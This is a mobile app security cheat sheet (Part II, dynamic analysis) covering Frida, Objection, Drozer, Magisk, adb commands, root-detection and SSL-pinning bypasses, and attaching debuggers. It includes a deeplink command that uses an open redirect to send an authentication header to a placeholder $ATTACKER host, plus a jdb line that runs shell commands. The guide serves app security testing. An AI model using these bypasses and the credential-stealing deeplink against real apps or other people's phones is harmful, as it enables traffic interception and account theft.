✅ The Ultimate Cheat Sheet for Android and iOS hacking: Part II (Dynamic Analysis)
✅ The Ultimate Cheat Sheet for Android and iOS hacking: Part II (Dynamic Analysis)
Learn how to find vulnerabilities for Android and iOS
In this post you will learn how to use different tools and frameworks to audit the security of running Apps in Android and Apple smartphones.
Android emulators
Genymotion Cloud: Cloud-based Android emulators running on SaaS or as virtual images on AWS, GCP or Alibaba Cloud (PaaS)
Genymotion Desktop: Desktop Android emulator
iOS emulators
Corellium iOS emulator for PC. Also emulates Android.
Frameworks for Dynamic Analysis
Frida
Frida brings dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
Prerequisites for installing Frida:
Python 3
How to install Frida in your computer:
sudo pip install frida-toolsBasic commands:
frida-ps
frida-ls-devicesLaunch SnapChat and trace crypto API calls:
frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"Intercept system calls open() and strcmp():
frida-trace -U -i open -i strcmp -f $PACKAGETrace an Obj-C methods (iOS):
frida-trace -U -m "-[NSView drawRect:]" -f $PACKAGE
frida-trace -U -m "*[$CLASS *]" -f $PACKAGEDownload and install frida server in the phone:
https://github.com/frida/frida/releases/download/12.11.12/frida-server-12.11.12-android-arm64.xz
Run the frida server in the mobile phone:
adb shell su -c "chmod 755 /data/local/tmp/frida-server"
adb shell su -c "/data/local/tmp/frida-server" &References:
Objection (frida)
Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture ‘’without the need for a jailbroken or rooted mobile device’’.
git clone https://github.com/sensepost/objection
cd objection
pip3 install objectionSSL pining bypass for iOS:
objection -N explore -q
# ios sslpinning disableSSL pining bypass for Android:
objection -N explore -q
# android sslpinning disableReferences:
Fridump (frida)
References:
http://pentestcorner.com/introduction-to-fridump/: Fridump — Memory dumper tool for Android and iOS
Frameworks for iOS
Needle
Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.
Prerequisites:
Jailbroken device
Cydia
Apt 0.7 Strict
References:
Frameworks for Android
TRWD
Pixel 3a https://eu.dl.twrp.me/sargo/
Android Factory/OTA images
Unofficial boot.img catalogue https://desktop.firmware.mobi/
Factory images: https://developers.google.com/android/images
OTA images: https://developers.google.com/android/ota
Extract boot.img from a payload.bin in an OTA package: https://github.com/cyxx/extract_android_ota_payload
python3 extract_android_ota_payload/extract_android_ota_payload.py payload.bin .
Extracting 'boot.img'
Extracting 'system.img'
Extracting 'vbmeta.img'
Extracting 'dtbo.img'
Extracting 'vendor.img'
Extracting 'abl.img'
Extracting 'aop.img'
Extracting 'cmnlib.img'
Extracting 'cmnlib64.img'
Extracting 'devcfg.img'
Extracting 'hyp.img'
Extracting 'keymaster.img'
Extracting 'qupfw.img'
Extracting 'tz.img'
Extracting 'xbl.img'
Extracting 'xbl_config.img'
Extracting 'modem.img'Xposed
Framework that can change the behaviour of the system and apps without touching any APKs
References:
Drozer
drozer console connectReferences:
https://github.com/mwrlabs/drozer: The Leading Security Assessment Framework for Android
Cydia
Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process’s memory.
References:
Magisk Manager
Magisk is a suite of open source tools for customizing Android, supporting devices higher than Android 4.2. It covers fundamental parts of Android customization: root, boot scripts, SELinux patches, AVB2.0 / dm-verity / forceencrypt removals etc.
Tool that helps you to root your phone and has cool features such as hide to an app that the phone is rooted so you can run it (i.e. bank apps)
Useful commands using adb
Get Android properties:
adb shell getpropGet Android Version:
adb shell getprop ro.build.version.releaseGet CPU type:
adb shell getprop ro.product.cpu.abiSet debuggable property to 1:
adb shell setprop ro.debuggable 1Make an screenshot of the phone screen:
adb shell screencap -p /sdcard/Download/screencap.pngMake an screencast of the screen in real time:
adb shell screenrecord –bit-rate 12000000 /sdcard/Download/screen.mp4Deeplinks analysis:
adb shell dumpsys $PACKAGE domain-preferred-appsList installed packages:
adb shell pm list packages -fPath to the apk file:
adb shell pm path $PACKAGEShow recent apps:
adb shell dumpsys activity recentsInstall app in the phone:
adb install $APKTo install an app with Android App Bundles, otherwise you will get Failure [INSTALL_FAILED_VERIFICATION_FAILURE] error. Warning: All apks must be signed using the same key:
adb install-multiple base.apk $APK1.apk $APK2.apkOther useful resources inside the package data:
/data/data/$PACKAGE/shared_prefs/
Mobile Application Pentest Techniques
Root detection
Bypassing Root Detection:
frida --codeshare dzonerzy/fridantiroot -f $PACKAGERoot Detection:
https://github.com/dpnishant/appmon/blob/master/intruder/scripts/Android/RootDetection.js
SSL Unpinning articles and tools
Disabling OkHttp’s SSL Pinning on Android Apps modifying Smali code (2018) https://medium.com/@cooperthecoder/disabling-okhttps-ssl-pinning-on-android-bd116aa74e05
Disabling ssl pinning in Pokemon Go 0.31.0 (2016) patching libNianticLabsPlugin.so library https://eaton-works.com/2016/07/31/reverse-engineering-and-removing-pokemon-gos-certificate-pinning/
Just Trust Me https://github.com/Fuzion24/JustTrustMe/blob/master/app/src/main/java/just/trust/me/Main.java
Frida CodeShare: The Frida CodeShare project is comprised of developers from around the world working together with one goal — push Frida to its limits in new and innovative ways.
Xposed Module: Just Trust Me: Xposed Module to bypass SSL certificate pinning.
adb install ./JustTrustMe.apkXposed Module: SSLUnpinning Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).
adb install mobi.acpm.sslunpinning_latest.apkCydia Substrate Module: Android SSL Trust Killer: Blackbox tool to bypass SSL certificate pinning for most applications running on a device.
adb install Android-SSL-TrustKiller.apkBypassing SSL Pinning with Frida
frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f $PACKAGE
frida -U -f $PACKAGE -l universal-android-ssl-pinning-bypass-with-frida.js --no-pauseNotes on certificate pinning on Android
As we know, usually certificate pinning does not link to an specific certificate but all the trusted certificates installed in the system. Therefore, if we installed the burpsuite certificate and trust it in the mobile phone, we will be able to break SSL and intercept all the traffic in plain text using burp. However, starting in Android 7 all apps only trust system Certificate Authorities (CA) by default, and distrust user installed CAs certificates. That mean that we can still break SSL when browsing HTTPS websites with Chrome, Firefox, etc BUT we cannot intercept HTTPS connections made from the apps.
To bypass this, we can from the static analysis, add in AndroidManifest.xml that we explicitly allow user installed CAs:
<application android:networkSecurityConfig="@xml/network_security_config">Inside the res/xml/network_security_config file:
<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
<domain-config>
<domain includeSubdomains="true">example.com</domain>
<trust-anchors>
<certificates src="@raw/my_ca"/>
<certificates src="system"/>
<certificates src="user"/>
</trust-anchors>
<pin-set expiration="2018-01-01">
<pin digest="SHA-256">7HIpactkIAq2Y49orFOOQKurWxmmSFZhBCoQYcRhJ3Y=</pin>
<!-- backup pin -->
<pin digest="SHA-256">fwza0LRMXouZHRC8Ei+4PyuldPDcf3UKgO/04cDM1oE=</pin>
</pin-set>
</domain-config>
</network-security-config>Or dynamically, use frida to hijack call SSLContext and attach the trusted keystores that we want to. See https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/
Other references:
https://developer.android.com/training/articles/security-config.html#CertificatePinning
https://developer.android.com/training/articles/security-ssl.html#UnknownCa
Install Burpsuite certificate in system CAs (< Android 10)
Prerequisite: Rooted Android phone
openssl x509 -inform DER -in cacert.der -out cacert.pem
HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb push cacert.pem /sdcard/Download/$HASH.0
adb shell su -c "mount -o rw,remount /system"
adb shell su -c "mv /sdcard/Download/$HASH.0 /system/etc/security/cacerts/
adb shell su -c "chmod 644 /system/etc/security/cacerts/$HASH.0"If you prefer to use an app to do that, Root Certificate Manager is a good option: https://play.google.com/store/apps/details?id=net.jolivier.cert.Importer
Mobile phone communications interception
If you want to inspect all phone traffic through BurpSuite the easiest way and you do NOT need a rooted phone is to set up in burpsuite that you want to attach to the LAN IP address and use this IP address and port as a proxy inside your phone wifi settings. This will route all your phone traffic through Burpsuite.
If you are interested only in getting all traffic related to an specific app and you have a rooted phone, ProxyDroid is a good option for this: https://play.google.com/store/apps/details?id=org.proxydroid
More info here:
Invoke deeplinks manually
Howto use open redirect to steal credentials:
adb shell am start -a android.intent.action.VIEW $INTENT://$DEEPLINK?$PARAM=https://$ATTACKER --ez authentication_header trueDebuggers for Android
jdwp
First recompile the package with the android:debuggable=”true”
Shows PIDs with debuggable enabled:
adb jdwpThen do port forwarding to the external port and attach to the process:
adb forward tcp:7777 jdwp:$PID
{echo "suspend"; cat;} | jdb -attach localhost:7777Useful jdb commands:
classes: Lists all classes
methods $CLASS: List methods of a class
stop in $CLASS.func(): Set a breakpoint in func()
main[1] locals
main[1] next
main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("pwd").getInputStream())).readLine())
main[1] print name
main[1] set name="foo"
main[1] list
main[1] where
main[1] contInstead to repackage an apk to make it debuggable, try:
$ adb shell
sailfish:/ $ su
sailfish:/ # resetprop ro.debuggable 1
sailfish:/ # stop
sailfish:/ # start
sailfish:/ # exit
sailfish:/ $ exit
$ adb shell am set-debug-app -w $PACKAGEEnable debug persistent flag:
adb shell am set-debug-app -w --persistent $PACKAGEUndo debug persistent flag:
adb shell am clear-debug-app $PACKAGEgdb-server
adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp
/data/local/tmp/gdbserver --attach localhost:1234 $PIDReferences:
You might also like: